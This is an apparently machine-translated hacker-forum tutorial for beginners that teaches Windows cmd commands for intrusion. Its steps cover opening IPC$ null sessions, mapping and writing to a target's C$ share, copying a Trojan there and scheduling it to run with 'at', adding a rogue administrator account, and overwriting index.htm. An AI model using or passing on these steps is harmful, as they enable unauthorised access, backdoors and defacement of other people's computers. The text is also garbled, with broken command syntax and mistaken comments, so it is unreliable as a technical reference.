Source: http://www.hacker-cn.com/
Hello everyone, I am a newbie and I am also a cainiao. I hope to grow up with everyone. Next I will introduce my security knowledge.
Section 1
Network commands required by cainiao
To learn about network intrusion, we must first learn some basic network commands. The so-called basic commands are actually windows 2 K, and some DOS commands under Windows XP system. These commands are completed by using cmd.exe.
Concept:
(1) 2000, xp cmd and 98 MS-DOS differences:
Directory to execute many DOS commands, such as dir, cd, del, and so on!
(2) The Internal commands in CMD are different from those in external commands:
The internal commands in CMD are the commands that can be executed directly in CMD, such as telnet, ftp, dir, cd, and so on, you can enter help in CMD to view the external commands, that is, commands that cannot be directly run in cmd. (For example, common nc commands) He needs to switch to his (NC) under CMD) you can run the NC and NC commands only in the directory where they are located.
Practices:
(1): Common Intrusion Protection commands:
Net, telnet, at, copy, ftp, finger, del ~~~~~~
Some common Net commands and examples:
(1) commands for establishing an IPC connection
Net use // IP/ipc $ ""/user: username
For example:
Net use // 127.0.0.1/ip$ 123456/user: administrator
This command is used to establish an ipc $ null connection with the host 127.0.0.1 with the username adminidtrator and password 123456.
(2) Delete An IPC $ null connection
Net use // ip/del
For example:
Net use // 127.0.0.1/del
Delete the Ipc $ connection established with host 127.0.0.1
(3) Start and close the service:
Net start // view the Enabled Services
Net start servername
Net stop servername
For example:
Net start telnet // enable the telnet Service
Net stop telnet // disable the telnet Service
(4) Enable and disable sharing
Net shate ipc $ Content $ nbsp; // enable ipc $ default share
Net share ipc $/del // disable ipc $ default share
Net share c = c: // fully share the c drive
Net share d = d: // delete a fully shared d Disk
(4) Hard Disk ing
Net use z: // ip/c $
For example:
Net use z: // 127.0.0.1/c $ Content $ nbsp; // map the c disk of 127.0.0.1 to the z disk of the machine.
Note: After the ing is successful, you will have an extra hard disk Z in my computer. In fact, Z is the C drive of 127.0.0.1!
Net use z:/del // disconnect the ing
Role in intrusion: After ing the hard disk of the other party, we can directly copy the file to the hard disk of the other party.
Successful implementation: You must establish an ipc $ connection with the other party.
(5) remote file Copy
Copy e:/3389.exe // 127.0.0.1/c $ Content $ nbsp; // copy the file 3389.exe from the local edrive to the c drive root directory of the other system.
The role of Copy in intrusion: Copy local files to the target disk
Required for successful Copy: You must establish an ipc $ connection with the host.
(6) view the time of the remote system
Net time // IP
Net time // 127.0.0.1 // view the local time of the remote host 127.0.0.1
Purpose: Get the other party's time to prepare for planting Trojans for their scheduled tasks.
(7) remote program running
At // ip time server.exe
At // 127.0.0.1 c:/server.exe // Let the host run At noon we have copied to his C
Trojan server.exe in the root directory
Role in intrusion: in this way, we can use our Trojan server to connect to our Trojan to better use the Graphic Method to Control broilers.
(8) add an Administrator Account:
Net user username 1234/add // add a user whose password is 1234 and whose name is username
Net localgroup administrators juntuan/add // add the username user to the Administrator Group
Note: You need to modify the Administrator group of some systems based on the actual situation, but the Administrator group of 99.9% of the system is still the Administrator group of administrators.
Change User Password:
Net user username 1234 // change the password of user username to 1233.
(9) remote host login _ telnet
Telnet IP port
For example, telnet 127.0.0.1 1234 // connect to port 1234 of 127.0.0.1
(When the port of the target host is 23 by default, we do not need + port: telnet IP)
(10) file transfer command _ ftp
In fact, I personally think this is not very useful. After all, when you get the FTP password, how can you use flashftp or cutftp TO HAVE A graphic cross-section interaction?
First, enter ftp in CMD.
Enter: open IP port
For example, open 127.0.0.1 1234 // connect to port 1234 of 127.0.0.1
How to enable the ftp service in windows:
Net start msftppsvc
(11) Viewing folder properties _ cacls
Cacls xiaod // view the attributes of the folder xiaod
Parameter description: F :( completely controlled) R :( read-only) C :( allowed to change) W :( allowed to write) N :( no permission)
(12) delete file _ del
Del is a command used to delete files.
First, go to the directory of the file you want to delete.
Del xiaod.txt // Delete the xiaod.txt File
Del xiaod.txt/f // force Delete the xiaod.txt file (Use this command when the file cannot be deleted normally)
(13) finger command
Finger is an information spying command. Generally, the command is used when the other party opens port 79.
Finger-l user @ computer
Parameter Details:-l display messages in long list format
User: User information
Successful implementation: the peer must install the TCP/IP protocol.
(14): file write command _ echo:
Echo Hello> index.htm // use a volume to overwrite index.htm content
Echo Hello> index.htm // upload your desired volume to index.htm
(15): Write the Registry file _ regedit
Regedit/s filename. reg/s is the write Parameter
(16): Port ing _ chgport
Chgport 3 = 5 // map Port 3 to 5
Chgport/d * // delete all port ing
(17): file ing _ subst
Subst B:/c:/winnt // when you access disk B, you access the c:/winnt directory.
(18): view the account currently in use:
Query session // view the account
(19): kicker:
Logoff id // note the ID, which is the id of the user viewed in the query session instead of the user name.
(20): Send a message to a user or an intranet host.
Net send hostname or/IP message
For example, net send xiaod or/127.0.0.1 hello!